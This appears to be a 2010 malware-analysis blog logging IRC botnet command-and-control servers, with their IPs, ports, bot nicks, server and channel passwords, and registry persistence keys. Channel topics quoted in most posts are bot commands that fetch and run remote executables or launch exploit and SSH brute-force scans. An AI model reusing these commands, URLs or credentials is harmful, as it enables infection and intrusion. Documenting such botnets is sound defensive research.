Found 2 addresses
addr: aaaaaaaa.schooluni.us ip: 109.196.130.66
addr: aaaaaaaa.schooluni.us ip: 109.196.130.50
aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by nonSTOPspread66 on Sat Dec 18 23:19:01
Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\gwdrive32.exe
Sunday, December 19, 2010
aaaaaaaa.schooluni.us (bfbot) &(rxbot)
Posted by Role at 5:18 AM 0 comments
Friday, December 17, 2010
im.maximum-irc.info
im.maximum-irc.info
Found 4 addresses
addr: im.maximum-irc.info ip: 119.202.198.117
addr: im.maximum-irc.info ip: 139.91.102.100
addr: im.maximum-irc.info ip: 139.91.102.101
addr: im.maximum-irc.info ip: 150.165.168.123
im.maximum-irc.info:9595
139.91.102.101:9595
Nick: [USA|00|XP|P|48168]
Username: ywzyhaf
Server Pass: Peja0444@
Joined Channel: #!!IM!! with Password fatj00
Channel Topic for Channel #!!IM!!: ".dl.start http://dl.dropbox.com/u/14684555/r.exe C:\r.exe 1 -s"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows winlogin.exe
C:\WINDOWS\winlogin.exe
Posted by Role at 7:12 PM 0 comments
bean.F-QACS.INFO
bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed
HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Windows Service Host
C:\Documents and Settings\Administrator\Application Data\svchost.exe
Posted by Role at 7:08 PM 0 comments
flash.quickupdates.net (Yewnix)
flash.quickupdates.net:5337
46.4.232.76:5337
Nick: :{00-USA-XP-pc3-3370}
Username: blaze
Joined Channel: #join with Password error
Channel Topic for Channel #join: ".aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r -b -e -s |.scan SVRSVC_ESP 35 3 0 -b -r -e -s |.scan SVRSVC_ESP_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_ARG 35 3 0 -b -r -e -s |.scan SVRSVC_ARG_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_RUS 35 3 0 -b -r -e -s |.scan SVRSVC_RUS_SP2 35 3 0 -b -r -e -s"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ info
Windows Data Serivce C:\WINDOWS\services.exe
Posted by Role at 7:04 PM 0 comments
Wednesday, November 3, 2010
pig.botsgod.info
Botnet C&C irc
Found 3 addresses
addr: pig.botsgod.info ip: 217.70.188.30
addr: pig.botsgod.info ip: 92.243.28.194
addr: pig.botsgod.info ip: 95.142.163.184
pig.botsgod.info:5900
User Name: VirUs
Real Name: Iam_PIG_And_Iam_A_GAY0003
Password: isPigaGAY
Nick Name: [USA][XP-SP3]371106
Channel:##ENC##
Password:Pig_IS_STUPID
Topic is '!NL FRRN%^^UUU]QGRCN?J?AC]A3K^NPCEW^BAVN`]HNCE QQBQBC]CVC | !NL FRRN%^^QCPTCP\B?R?]2CR^G2QR?JJ]}#"~~]CVC ?QBQB]CVC | !NL FRRN%^^NP3K3SN]G2D3^QCRSN"`~]CVC QBQBBB]CVC | !NL FRRN%^^Q3DRU?PCU3PI]2CR^G2QR?JJ]}#"~~]CVC ufuf]gzg'
* Set by xXx on Wed Nov 03 17:52:13
Creates value "Microsoft UneXpected"="C:\TEMP\mtfsys32.exe" in key "
HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
Creates a mutex PigGotFucKedManyTimesAndAlreadyProvedHimGay.
Creates process "mtfsys32.exe".
malware url
http://www.sitepalace.com/pregy/ENCS1p1.jpeg
Posted by Role at 8:26 AM 0 comments
Tuesday, July 6, 2010
gangbang.mytijn.org ( ssh2 )
gangbang.mytijn.org DNS_TYPE_A 98.156.90.172 85.92.87.233
98.156.90.172:43000
Botnet C&C irc
Nick: |KOR|XP|00|803303|
Username: SP3-443
Server Pass: scary
Joined Channel: #!ssh with Password ERROR
Channel Topic for Channel #!ssh: ".aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 86.x.x.x -b -r -s"
Startup
Services Created:
Name Type Path
Windows System Updates SERVICE_AUTO_START "C:\Documents and Settings\Administrator\Application Data\exxploiter.exe"
Posted by Role at 7:23 PM 0 comments
Saturday, July 3, 2010
irc.metraiciono.com
irc.metraiciono.com DNS_TYPE_A 95.211.84.164
95.211.84.164:6567
Botnet C&C irc
Nick: [SI|AUT|00|P|04244]
Username: XP-5923
Server Pass: pr1v4d0onl1n3r
Joined Channel: #canal1# with Password c1rc0s0leil
Channel Topic for Channel #canal1#: ".desfi http://174.121.2.222/~toxicok/wp-content/languages/home.exe c:\WINDOWS\home.exe 1"
Private Message to Channel #canal1#: "[Dl]: File download: 128.0KB to: c:\WINDOWS\home.exe @ 64.0KB/sec."
Private Message to Channel #canal1#: "[Dl]: Created process: "c:\WINDOWS\home.exe", PID: <448>"
Startup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe
HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe
Posted by Role at 9:27 PM 0 comments